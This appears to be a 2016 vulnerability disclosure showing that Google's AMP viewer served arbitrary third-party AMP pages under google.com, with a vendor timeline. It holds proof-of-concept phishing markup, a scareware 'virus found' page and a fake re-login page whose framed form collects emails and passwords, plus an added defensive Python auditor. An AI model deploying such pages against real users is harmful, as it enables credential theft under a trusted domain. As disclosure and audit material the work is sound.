A flaw in Google.com can be used to host malicious content under the Google.com domain. However, such content is not able to interact with anything on the Google.com domain itself.
Google's main website provides a subsite for displaying mobile-optimized pages published using a special subset of HTML called AMP (Accelerated Mobile Pages). The current implementation will display any AMP page on the Internet without checking its content. The URL is as follows:
where XXXX is the URL of the site. This ONLY works on mobile devices; it can be simulated on a desktop using Chrome's developer tools (device emulation), but a plain desktop browser will be redirected to the original page itself (as described in our earlier post). Here is a real working example:
Source code (BODY tag only; the rest is standard AMP HTML, see here):
<body>
<amp-img src="glogo.jpg" alt="logo" height="200px" width="300px"></amp-img>
<h3>We have scanned your phone and found it to be infected with a virus. To clean your phone, please click on the link below</h3>
<p><a href="https://play.google.com/store/apps/details?id=com.cleanmaster.mguard&hl=en">Clean My Phone</a></p>
</body>
Main page BODY:
<body>
<amp-img src="glogo.jpg" alt="logo" height="300px" width="300px"></amp-img>
<amp-img src="glogo.jpg" alt="logo" height="300px" width="300px"></amp-img>
<h3>You have logged out of your account, please login again below</h3>
<amp-iframe width="300px" height="300px" sandbox="allow-scripts allow-forms" layout="responsive" frameborder="0" src="iframe.html"></amp-iframe>
</body>
iframe.html (the page loaded by the amp-iframe above):
<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Test1</title>
</head>
<body>
<form action="form.py">
Email: <input type="text" name="email"/><br/>
Password: <input type="password" name="password"/><br/>
<input type="submit"/>
</form>
</body>
</html>
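The two listings above show what the phishing page relies on: an amp-iframe whose sandbox grants allow-forms (so the framed login form can post credentials) but not allow-same-origin (so the frame has an opaque origin and cannot touch the embedding page). The following auditor is an added example, not code from the original post or from the AMP project; it uses only the Python standard library, and the host attacker.example and the page contents are constructed placeholders that mirror the listings above.

```python
# Added example (not from the original post): audit an AMP page for
# <amp-iframe> sandbox grants and for forms that collect passwords.
# Standard library only. URLs and page contents below are constructed
# for the example; attacker.example is a placeholder host.
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class AmpAuditor(HTMLParser):
    """Collects <amp-iframe> sandbox flags and <form>/<input> facts."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.page_host = urlsplit(page_url).hostname
        self.iframes = []         # one dict per <amp-iframe>
        self.forms = []           # one dict per <form>
        self.password_inputs = 0  # <input type="password"> count
        self._form = None         # form currently being parsed, if any

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # html.parser lowercases tag and attribute names
        if tag == "amp-iframe":
            src = urljoin(self.page_url, a.get("src") or "")
            flags = set((a.get("sandbox") or "").split())
            self.iframes.append({
                "src": src,
                "third_party": urlsplit(src).hostname != self.page_host,
                "can_submit_forms": "allow-forms" in flags,
                "can_run_scripts": "allow-scripts" in flags,
                # Without allow-same-origin the frame gets an opaque origin:
                # it can draw a login form, but cannot read the embedding
                # page's DOM, cookies or storage.
                "isolated_from_parent": "allow-same-origin" not in flags,
            })
        elif tag == "form":
            self._form = {"action": urljoin(self.page_url, a.get("action") or ""),
                          "password_field": False}
            self.forms.append(self._form)
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_inputs += 1
            if self._form is not None:
                self._form["password_field"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._form = None


def audit(page_html, page_url):
    """Parse one page and return its findings as a dict."""
    p = AmpAuditor(page_url)
    p.feed(page_html)
    p.close()
    return {"iframes": p.iframes, "forms": p.forms,
            "password_inputs": p.password_inputs}


def issues(findings):
    """Turn findings into the lines a reviewer would want flagged."""
    out = []
    for f in findings["iframes"]:
        if f["can_submit_forms"]:
            out.append("amp-iframe %s can submit forms" % f["src"])
        if not f["isolated_from_parent"]:
            out.append("amp-iframe %s shares the parent's origin" % f["src"])
    for form in findings["forms"]:
        if form["password_field"]:
            out.append("form posts a password to %s" % form["action"])
    return out


# Constructed inputs mirroring the post's two listings (placeholder host).
PAGE_URL = "https://attacker.example/index.html"
PAGE_HTML = """<body>
<h3>You have logged out of your account, please login again below</h3>
<amp-iframe width="300px" height="300px" sandbox="allow-scripts allow-forms"
  layout="responsive" frameborder="0" src="iframe.html"></amp-iframe>
</body>"""

IFRAME_URL = "https://attacker.example/iframe.html"
IFRAME_HTML = """<!doctype html><html><head><meta charset="utf-8"></head><body>
<form action="form.py">
Email: <input type="text" name="email"/><br/>
Password: <input type="password" name="password"/><br/>
<input type="submit"/>
</form></body></html>"""

if __name__ == "__main__":
    for url, page in ((PAGE_URL, PAGE_HTML), (IFRAME_URL, IFRAME_HTML)):
        print(url)
        for line in issues(audit(page, url)):
            print("  -", line)
```

Run against the outer page, the auditor reports only that the frame can submit forms; it does not report a shared origin, which is the reason the framed content cannot reach into the page that hosts it. Run against iframe.html, it reports the password-collecting form and the resolved action URL, which is the check worth running on any page you are asked to whitelist in a viewer that serves third-party AMP content under your own domain.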
The vendor has communicated that they do not consider this to be a security issue.
- Google Security CID: 8-1639000011264
- AMP site: https://www.ampproject.org/
Researched and written by Yakov Shafranovich.
2016-04-12: Vendor notified
2016-04-13: Vendor response
2016-04-13: Public disclosure